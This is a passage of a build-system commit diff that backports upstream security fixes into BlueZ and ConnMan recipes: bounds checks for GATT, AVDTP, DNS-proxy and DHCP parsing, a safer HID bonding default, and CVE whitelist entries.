+-	ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
+-						BT_ATT_PERM_READ_AUTHEN |
+-						BT_ATT_PERM_READ_ENCRYPT);
++	ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
+ 	if (ecode)
+ 		goto error;
+ 
+@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ 	util_debug(server->debug_callback, server->debug_data,
+ 				"Prep Write Req - handle: 0x%04x", handle);
+ 
+-	ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+-						BT_ATT_PERM_WRITE_AUTHEN |
+-						BT_ATT_PERM_WRITE_ENCRYPT);
++	ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ 	if (ecode)
+ 		goto error;
+ 
+-- 
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
new file mode 100644
index 0000000000..f52ff47a06
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
@@ -0,0 +1,34 @@
+From 3a40bef49305f8327635b81ac8be52a3ca063d5a Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Mon, 4 Jan 2021 10:38:31 -0800
+Subject: [PATCH] gatt: Fix potential buffer out-of-bound
+
+When client features is read check if the offset is within the cli_feat
+bounds.
+
+Fixes: https://github.com/bluez/bluez/issues/70
+
++Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=3a40bef49305f8327635b81ac8be52a3ca063d5a]
++Signed-off-by: Steve Sakoman <steve@sakoman.com>
++CVE: CVE-2021-3588
+
+---
+ src/gatt-database.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/gatt-database.c b/src/gatt-database.c
+index 90cc4bade..f2d7b5821 100644
+--- a/src/gatt-database.c
++++ b/src/gatt-database.c
+@@ -1075,6 +1075,11 @@ static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
+ 		goto done;
+ 	}
+ 
++	if (offset >= sizeof(state->cli_feat)) {
++		ecode = BT_ATT_ERROR_INVALID_OFFSET;
++		goto done;
++	}
++
+ 	len = sizeof(state->cli_feat) - offset;
+ 	value = len ? &state->cli_feat[offset] : NULL;
+ 
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
new file mode 100644
index 0000000000..1738ca13da
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
@@ -0,0 +1,95 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+discoverable setting shall only be store when changed via Discoverable
+property and not when discovery client set it as that be considered
+temporary just for the lifetime of the discovery.
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/b497b5942a8beb8f89ca1c359c54ad67ec843055]
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ 	if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ 		g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ 					ADAPTER_INTERFACE, "Discoverable");
+-		store_adapter_info(adapter);
++		/* Only persist discoverable setting if it was not set
++		 * temporarily by discovery.
++		 */
++		if (!adapter->discovery_discoverable)
++			store_adapter_info(adapter);
+ 		btd_adv_manager_refresh(adapter->adv_manager);
+ 	}
+ 
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ 	struct mgmt_cp_start_service_discovery *sd_cp;
+-	GSList *l;
+-
+ 
+ 	DBG("");
+ 
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ 		return -ENOMEM;
+ 	}
+ 
+-	for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+-		struct discovery_client *client = l->data;
++	/* Only attempt to overwrite current discoverable setting when not
++	 * discoverable.
++	 */
++	if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++		GSList *l;
+ 
+-		if (!client->discovery_filter)
+-			continue;
++		for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++			struct discovery_client *client = l->data;
+ 
+-		if (client->discovery_filter->discoverable)
+-			break;
+-	}
++			if (!client->discovery_filter)
++				continue;
+ 
+-	set_discovery_discoverable(adapter, l ? true : false);
++			if (client->discovery_filter->discoverable) {
++				set_discovery_discoverable(adapter, true);
++				break;
++			}
++		}
++	}
+ 
+ 	/*
+ 	 * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ 		return 0;
+ 	}
+ 
+-	if (adapter->discovery_discoverable)
+-		set_discovery_discoverable(adapter, false);
++	set_discovery_discoverable(adapter, false);
+ 
+ 	/*
+ 	 * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ 	g_free(adapter->current_discovery_filter);
+ 	adapter->current_discovery_filter = NULL;
+ 
++	set_discovery_discoverable(adapter, false);
+ 	adapter->discovering = false;
+ 
+ 	while (adapter->connections) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
new file mode 100644
index 0000000000..646b5ddfc8
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
@@ -0,0 +1,66 @@
+From 0d328fdf6564b67fc2ec3533e3da201ebabcc9e3 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 8 Jun 2021 16:46:49 -0700
+Subject: [PATCH] shared/gatt-server: Fix heap overflow when appending prepare
+ writes
+
+The code shall check if the prepare writes would append more the
+allowed maximum attribute length.
+
+Fixes https://github.com/bluez/bluez/security/advisories/GHSA-479m-xcq5-9g2q
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/591c546c536b42bef696d027f64aa22434f8c3f0]
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+CVE: CVE-2022-0204
+
+---
+ src/shared/gatt-server.c | 22 ++++++++++++++++++++++
+ 1 file changed, 22 insertions(+)
+
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index 0c25a97..20e14bc 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -816,6 +816,20 @@ static uint8_t authorize_req(struct bt_gatt_server *server,
+ 						server->authorize_data);
+ }
+ 
++static uint8_t check_length(uint16_t length, uint16_t offset)
++{
++	if (length > BT_ATT_MAX_VALUE_LEN)
++		return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++	if (offset > BT_ATT_MAX_VALUE_LEN)
++		return BT_ATT_ERROR_INVALID_OFFSET;
++
++	if (length + offset > BT_ATT_MAX_VALUE_LEN)
++		return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++	return 0;
++}
++
+ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ 					uint16_t length, void *user_data)
+ {
+@@ -846,6 +860,10 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ 				(opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ 				handle);
+ 
++	ecode = check_length(length, 0);
++	if (ecode)
++		goto error;
++
+ 	ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ 	if (ecode)
+ 		goto error;
+@@ -1353,6 +1371,10 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ 	util_debug(server->debug_callback, server->debug_data,
+ 				"Prep Write Req - handle: 0x%04x", handle);
+ 
++	ecode = check_length(length, offset);
++	if (ecode)
++		goto error;
++
+ 	ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ 	if (ecode)
+ 		goto error;
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
new file mode 100644
index 0000000000..4ca60f99d5
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
@@ -0,0 +1,39 @@
+From b808b2852a0b48c6f9dbb038f932613cea3126c2 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 09:51:27 +0530
+Subject: [PATCH] CVE-2022-3637
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/monitor/jlink.c?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f]
+CVE: CVE-2022-3637
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+monitor: Fix crash when using RTT backend
+
+This fix regression introduced by "monitor: Fix memory leaks".
+J-Link shared library is in use if jlink_init() returns 0 and thus
+handle shall not be closed.
+---
+ monitor/jlink.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/monitor/jlink.c b/monitor/jlink.c
+index afa9d93..5bd4aed 100644
+--- a/monitor/jlink.c
++++ b/monitor/jlink.c
+@@ -120,9 +120,12 @@ int jlink_init(void)
+ 			!jlink.tif_select || !jlink.setspeed ||
+ 			!jlink.connect || !jlink.getsn ||
+ 			!jlink.emu_getproductname ||
+-			!jlink.rtterminal_control || !jlink.rtterminal_read)
++			!jlink.rtterminal_control || !jlink.rtterminal_read) {
++		dlclose(so);
+ 		return -EIO;
++	}
+ 
++	/* don't dlclose(so) here cause symbols from it are in use now */
+ 	return 0;
+ }
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
new file mode 100644
index 0000000000..7bd1f5f80f
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
@@ -0,0 +1,126 @@
+From 752c7f707c3cc1eb12eadc13bc336a5c484d4bdf Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 28 Sep 2022 10:45:53 +0530
+Subject: [PATCH] CVE-2022-39176
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.6]
+CVE: CVE-2022-39176
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/audio/avdtp.c | 56 +++++++++++++++++++++++++++---------------
+ profiles/audio/avrcp.c |  8 ++++++
+ 2 files changed, 44 insertions(+), 20 deletions(-)
+
+diff --git a/profiles/audio/avdtp.c b/profiles/audio/avdtp.c
+index 782268c..0adf413 100644
+--- a/profiles/audio/avdtp.c
++++ b/profiles/audio/avdtp.c
+@@ -1261,43 +1261,53 @@ struct avdtp_remote_sep *avdtp_find_remote_sep(struct avdtp *session,
+ 	return NULL;
+ }
+ 
+-static GSList *caps_to_list(uint8_t *data, int size,
++static GSList *caps_to_list(uint8_t *data, size_t size,
+ 				struct avdtp_service_capability **codec,
+ 				gboolean *delay_reporting)
+ {
++	struct avdtp_service_capability *cap;
+ 	GSList *caps;
+-	int processed;
+ 
+ 	if (delay_reporting)
+ 		*delay_reporting = FALSE;
+ 
+-	for (processed = 0, caps = NULL; processed + 2 <= size;) {
+-		struct avdtp_service_capability *cap;
+-		uint8_t length, category;
++	if (size < sizeof(*cap))
++		return NULL;
++
++	for (caps = NULL; size >= sizeof(*cap);) {
++		struct avdtp_service_capability *cpy;
+ 
+-		category = data[0];
+-		length = data[1];
++		cap = (struct avdtp_service_capability *)data;
+ 
+-		if (processed + 2 + length > size) {
++		if (sizeof(*cap) + cap->length > size) {
+ 			error("Invalid capability data in getcap resp");
+ 			break;
+ 		}
+ 
+-		cap = g_malloc(sizeof(struct avdtp_service_capability) +
+-					length);
+-		memcpy(cap, data, 2 + length);
++		if (cap->category == AVDTP_MEDIA_CODEC &&
++					cap->length < sizeof(**codec)) {
++			error("Invalid codec data in getcap resp");
++			break;
++		}
++
++		cpy = btd_malloc(sizeof(*cpy) + cap->length);
++		memcpy(cpy, cap, sizeof(*cap) + cap->length);
+ 
+-		processed += 2 + length;
+-		data += 2 + length;
++		size -= sizeof(*cap) + cap->length;
++		data += sizeof(*cap) + cap->length;
+ 
+-		caps = g_slist_append(caps, cap);
++		caps = g_slist_append(caps, cpy);
+ 
+-		if (category == AVDTP_MEDIA_CODEC &&
+-				length >=
+-				sizeof(struct avdtp_media_codec_capability))
+-			*codec = cap;
+-		else if (category == AVDTP_DELAY_REPORTING && delay_reporting)
+-			*delay_reporting = TRUE;
++		switch (cap->category) {
++		case AVDTP_MEDIA_CODEC:
++			if (codec)
++				*codec = cpy;
++			break;
++		case AVDTP_DELAY_REPORTING:
++			if (delay_reporting)
++				*delay_reporting = TRUE;
++			break;
++		}
+ 	}
+ 
+ 	return caps;
+@@ -1494,6 +1504,12 @@ static gboolean avdtp_setconf_cmd(struct avdtp *session, uint8_t transaction,
+ 					&stream->codec,
+ 					&stream->delay_reporting);
+ 
++	if (!stream->caps || !stream->codec) {
++		err = AVDTP_UNSUPPORTED_CONFIGURATION;
++		category = 0x00;
++		goto failed_stream;
++	}
++
+ 	/* Verify that the Media Transport capability's length = 0. Reject otherwise */
+ 	for (l = stream->caps; l != NULL; l = g_slist_next(l)) {
+ 		struct avdtp_service_capability *cap = l->data;
+diff --git a/profiles/audio/avrcp.c b/profiles/audio/avrcp.c
+index d9471c0..0233d53 100644
+--- a/profiles/audio/avrcp.c
++++ b/profiles/audio/avrcp.c
+@@ -1916,6 +1916,14 @@ static size_t handle_vendordep_pdu(struct avctp *conn, uint8_t transaction,
+ 		goto err_metadata;
+ 	}
+ 
++	operands += sizeof(*pdu);
++	operand_count -= sizeof(*pdu);
++
++	if (pdu->params_len != operand_count) {
++		DBG("AVRCP PDU parameters length don't match");
++		pdu->params_len = operand_count;
++	}
++
+ 	for (handler = session->control_handlers; handler->pdu_id; handler++) {
+ 		if (handler->pdu_id == pdu->pdu_id)
+ 			break;
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
new file mode 100644
index 0000000000..43670ab2b3
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
@@ -0,0 +1,54 @@
+From 25a471a83e02e1effb15d5a488b3f0085eaeb675 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 10 Oct 2023 13:03:12 -0700
+Subject: input.conf: Change default of ClassicBondedOnly
+
+This changes the default of ClassicBondedOnly since defaulting to false
+is not inline with HID specification which mandates the of Security Mode
+4:
+
+BLUETOOTH SPECIFICATION Page 84 of 123
+Human Interface Device (HID) Profile:
+
+5.4.3.4.2 Security Modes
+Bluetooth HID Hosts shall use Security Mode 4 when interoperating with
+Bluetooth HID devices that are compliant to the Bluetooth Core
+Specification v2.1+EDR[6].
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=25a471a83e02e1effb15d5a488b3f0085eaeb675]
+CVE: CVE-2023-45866
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/input/device.c   | 2 +-
+ profiles/input/input.conf | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/profiles/input/device.c b/profiles/input/device.c
+index 375314e..0236488 100644
+--- a/profiles/input/device.c
++++ b/profiles/input/device.c
+@@ -93,7 +93,7 @@ struct input_device {
+ 
+ static int idle_timeout = 0;
+ static bool uhid_enabled = false;
+-static bool classic_bonded_only = false;
++static bool classic_bonded_only = true;
+ 
+ void input_set_idle_timeout(int timeout)
+ {
+diff --git a/profiles/input/input.conf b/profiles/input/input.conf
+index 4c70bc5..d8645f3 100644
+--- a/profiles/input/input.conf
++++ b/profiles/input/input.conf
+@@ -17,7 +17,7 @@
+ # platforms may want to make sure that input connections only come from bonded
+ # device connections. Several older mice have been known for not supporting
+ # pairing/encryption.
+-# Defaults to false to maximize device compatibility.
++# Defaults to true for security.
+ #ClassicBondedOnly=true
+ 
+ # LE upgrade security
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
index 8190924562..be74a35e0a 100644
--- a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
+++ b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
@@ -3,6 +3,16 @@ require bluez5.inc
 SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a"
 SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88"
 
+# These issues have kernel fixes rather than bluez fixes so exclude here
+CVE_CHECK_WHITELIST += "CVE-2020-12352 CVE-2020-24490"
+
+# Commit 7a80d2096f1b7125085e21448112aa02f49f5e9a, e2b0f0d8d63e1223bb714a9efb37e2257818268b 
+# and 0388794dc5fdb73a4ea88bcf148de0a12b4364d4 to fix CVE-2022-39177 
+# already backport in CVE-2022-39176.patch
+# https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1977968
+
+CVE_CHECK_WHITELIST += "CVE-2022-39177"
+
 # noinst programs in Makefile.tools that are conditional on READLINE
 # support
 NOINST_TOOLS_READLINE ?= " \
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index 778bf50191..24593d6258 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
 
 # 0.7 tag
 SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
-SRC_URI = "git://github.com/connectivity/connman-gnome.git \
+SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
            file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
            file://null_check_for_ipv4_config.patch \
            file://images/* \
diff --git a/meta/recipes-connectivity/connman/connman.inc b/meta/recipes-connectivity/connman/connman.inc
index 55e5bf97c7..c495ae29ad 100644
--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
 
 inherit autotools pkgconfig systemd update-rc.d update-alternatives
 
+CVE_PRODUCT = "connman connection_manager"
+
 DEPENDS  = "dbus glib-2.0 ppp"
 
 INC_PR = "r20"
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
new file mode 100644
index 0000000000..2648a832ca
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
@@ -0,0 +1,62 @@
+From e4079a20f617a4b076af503f6e4e8b0304c9f2cb Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:53 +0100
+Subject: [PATCH] dnsproxy: Add length checks to prevent buffer overflow
+
+Fixes: CVE-2021-26675
+
+Upstream-Status: Backport
+CVE: CVE-2021-26675
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e4079a20f617a4b076af503f6e4e8b0304c9f2cb
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ src/dnsproxy.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index a7bf87a1..4f5c897f 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1767,6 +1767,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+			char **uncompressed_ptr)
+ {
+	char *uptr = *uncompressed_ptr; /* position in result buffer */
++	char * const uncomp_end = uncompressed + uncomp_len - 1;
+
+	debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);
+
+@@ -1787,12 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+		 * tmp buffer.
+		 */
+
+-		ulen = strlen(name);
+-		strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
+-
+		debug("pos %d ulen %d left %d name %s", pos, ulen,
+			(int)(uncomp_len - (uptr - uncompressed)), uptr);
+
++		ulen = strlen(name);
++		if ((uptr + ulen + 1) > uncomp_end) {
++			goto out;
++		}
++		strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++
+		uptr += ulen;
+		*uptr++ = '\0';
+
+@@ -1802,6 +1806,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+		 * We copy also the fixed portion of the result (type, class,
+		 * ttl, address length and the address)
+		 */
++		if ((uptr + NS_RRFIXEDSZ) > uncomp_end) {
++			debug("uncompressed data too large for buffer");
++			goto out;
++		}
+		memcpy(uptr, ptr, NS_RRFIXEDSZ);
+
+		dns_type = uptr[0] << 8 | uptr[1];
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
new file mode 100644
index 0000000000..4104e4bfc6
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
@@ -0,0 +1,231 @@
+From 58d397ba74873384aee449690a9070bacd5676fa Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:39:14 +0100
+Subject: [PATCH] gdhcp: Avoid reading invalid data in dhcp_get_option
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=58d397ba74873384aee449690a9070bacd5676fa
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 20 +++++++++++---------
+ gdhcp/common.c | 24 +++++++++++++++++++-----
+ gdhcp/common.h |  2 +-
+ gdhcp/server.c | 12 +++++++-----
+ 4 files changed, 38 insertions(+), 20 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 09dfe5ec..6a5613e7 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1629,12 +1629,12 @@ static void start_request(GDHCPClient *dhcp_client)
+							NULL);
+ }
+
+-static uint32_t get_lease(struct dhcp_packet *packet)
++static uint32_t get_lease(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+	uint8_t *option;
+	uint32_t lease_seconds;
+
+-	option = dhcp_get_option(packet, DHCP_LEASE_TIME);
++	option = dhcp_get_option(packet, packet_len, DHCP_LEASE_TIME);
+	if (!option)
+		return 3600;
+
+@@ -2226,7 +2226,8 @@ static void get_dhcpv6_request(GDHCPClient *dhcp_client,
+	}
+ }
+
+-static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
++static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet,
++		uint16_t packet_len)
+ {
+	GDHCPOptionType type;
+	GList *list, *value_list;
+@@ -2237,7 +2238,7 @@ static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
+	for (list = dhcp_client->request_list; list; list = list->next) {
+		code = (uint8_t) GPOINTER_TO_INT(list->data);
+
+-		option = dhcp_get_option(packet, code);
++		option = dhcp_get_option(packet, packet_len, code);
+		if (!option) {
+			g_hash_table_remove(dhcp_client->code_value_hash,
+						GINT_TO_POINTER((int) code));
+@@ -2297,6 +2298,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+		re = dhcp_recv_l2_packet(&packet,
+					dhcp_client->listener_sockfd,
+					&dst_addr);
++		pkt_len = (uint16_t)(unsigned int)re;
+		xid = packet.xid;
+	} else if (dhcp_client->listen_mode == L3) {
+		if (dhcp_client->type == G_DHCP_IPV6) {
+@@ -2361,7 +2363,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+			dhcp_client->status_code = status;
+		}
+	} else {
+-		message_type = dhcp_get_option(&packet, DHCP_MESSAGE_TYPE);
++		message_type = dhcp_get_option(&packet, pkt_len, DHCP_MESSAGE_TYPE);
+		if (!message_type)
+			return TRUE;
+	}
+@@ -2378,7 +2380,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+		dhcp_client->timeout = 0;
+		dhcp_client->retry_times = 0;
+
+-		option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++		option = dhcp_get_option(&packet, pkt_len, DHCP_SERVER_ID);
+		dhcp_client->server_ip = get_be32(option);
+		dhcp_client->requested_ip = ntohl(packet.yiaddr);
+
+@@ -2428,9 +2430,9 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+
+			remove_timeouts(dhcp_client);
+
+-			dhcp_client->lease_seconds = get_lease(&packet);
++			dhcp_client->lease_seconds = get_lease(&packet, pkt_len);
+
+-			get_request(dhcp_client, &packet);
++			get_request(dhcp_client, &packet, pkt_len);
+
+			switch_listening_mode(dhcp_client, L_NONE);
+
+@@ -2438,7 +2440,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+			dhcp_client->assigned_ip = get_ip(packet.yiaddr);
+
+			if (dhcp_client->state == REBOOTING) {
+-				option = dhcp_get_option(&packet,
++				option = dhcp_get_option(&packet, pkt_len,
+							DHCP_SERVER_ID);
+				dhcp_client->server_ip = get_be32(option);
+			}
+diff --git a/gdhcp/common.c b/gdhcp/common.c
+index 1d667d17..c8916aa8 100644
+--- a/gdhcp/common.c
++++ b/gdhcp/common.c
+@@ -73,18 +73,21 @@ GDHCPOptionType dhcp_get_code_type(uint8_t code)
+	return OPTION_UNKNOWN;
+ }
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code)
+ {
+	int len, rem;
+-	uint8_t *optionptr;
++	uint8_t *optionptr, *options_end;
++	size_t options_len;
+	uint8_t overload = 0;
+
+	/* option bytes: [code][len][data1][data2]..[dataLEN] */
+	optionptr = packet->options;
+	rem = sizeof(packet->options);
++	options_len = packet_len - (sizeof(*packet) - sizeof(packet->options));
++	options_end = optionptr + options_len - 1;
+
+	while (1) {
+-		if (rem <= 0)
++		if ((rem <= 0) && (optionptr + OPT_CODE > options_end))
+			/* Bad packet, malformed option field */
+			return NULL;
+
+@@ -115,14 +118,25 @@ uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
+			break;
+		}
+
++		if (optionptr + OPT_LEN > options_end) {
++			/* bad packet, would read length field from OOB */
++			return NULL;
++		}
++
+		len = 2 + optionptr[OPT_LEN];
+
+		rem -= len;
+		if (rem < 0)
+			continue; /* complain and return NULL */
+
+-		if (optionptr[OPT_CODE] == code)
+-			return optionptr + OPT_DATA;
++		if (optionptr[OPT_CODE] == code) {
++			if (optionptr + len > options_end) {
++				/* bad packet, option length points OOB */
++				return NULL;
++			} else {
++				return optionptr + OPT_DATA;
++			}
++		}
+
+		if (optionptr[OPT_CODE] == DHCP_OPTION_OVERLOAD)
+			overload |= optionptr[OPT_DATA];
+diff --git a/gdhcp/common.h b/gdhcp/common.h
+index 9660231c..8f63fd75 100644
+--- a/gdhcp/common.h
++++ b/gdhcp/common.h
+@@ -179,7 +179,7 @@ struct in6_pktinfo {
+ };
+ #endif
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code);
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code);
+ uint8_t *dhcpv6_get_option(struct dhcpv6_packet *packet, uint16_t pkt_len,
+			int code, uint16_t *option_len, int *option_count);
+ uint8_t *dhcpv6_get_sub_option(unsigned char *option, uint16_t max_len,
+diff --git a/gdhcp/server.c b/gdhcp/server.c
+index 85405f19..52ea2a55 100644
+--- a/gdhcp/server.c
++++ b/gdhcp/server.c
+@@ -413,7 +413,7 @@ error:
+ }
+
+
+-static uint8_t check_packet_type(struct dhcp_packet *packet)
++static uint8_t check_packet_type(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+	uint8_t *type;
+
+@@ -423,7 +423,7 @@ static uint8_t check_packet_type(struct dhcp_packet *packet)
+	if (packet->op != BOOTREQUEST)
+		return 0;
+
+-	type = dhcp_get_option(packet, DHCP_MESSAGE_TYPE);
++	type = dhcp_get_option(packet, packet_len, DHCP_MESSAGE_TYPE);
+
+	if (!type)
+		return 0;
+@@ -651,6 +651,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+	struct dhcp_lease *lease;
+	uint32_t requested_nip = 0;
+	uint8_t type, *server_id_option, *request_ip_option;
++	uint16_t packet_len;
+	int re;
